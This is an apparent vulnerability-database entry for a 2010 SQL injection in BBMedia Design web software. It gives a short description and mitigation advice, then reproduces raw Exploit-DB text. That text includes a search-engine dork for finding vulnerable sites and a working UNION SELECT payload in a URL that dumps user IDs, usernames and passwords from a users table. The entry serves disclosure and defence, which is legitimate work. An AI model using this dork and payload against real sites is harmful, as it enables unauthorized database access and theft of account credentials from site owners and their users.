BBMedia Design's SQL Injection Vulnerability

vendor:

BBMedia Design

by:

Ashiyane Digital Security Team

9,3

CVSS

HIGH

SQL Injection

CWE

Product Name: BBMedia Design

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:bbmedia_design:

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

BBMedia Design’s SQL Injection Vulnerability

BBMedia Design's SQL Injection Vulnerability is a vulnerability in the BBMedia Design's web application which allows an attacker to inject malicious SQL queries into the web application. This vulnerability can be exploited by an attacker to gain access to the database and extract sensitive information such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, the application should be tested for SQL injection vulnerabilities and any vulnerable code should be fixed. Additionally, input validation should be implemented to ensure that user-supplied data is properly sanitized before being used in SQL queries.

Source

Exploit-DB raw data:

=========================================================
BBMedia Design's SQL Injection Vulnerability
=========================================================
##########################################
# Name: BBMedia Design's SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: http://www.bbmedia.org
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork: intext:"Design by BB Media.Org"

[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]

[+] Demo: http://server/prod_motors.php?id=-999+union+all+select+1,2,3,4,5,group_concat(id,0x3a,user,0x3a,pass),7,8,9,10,11,12+from+users

##########################################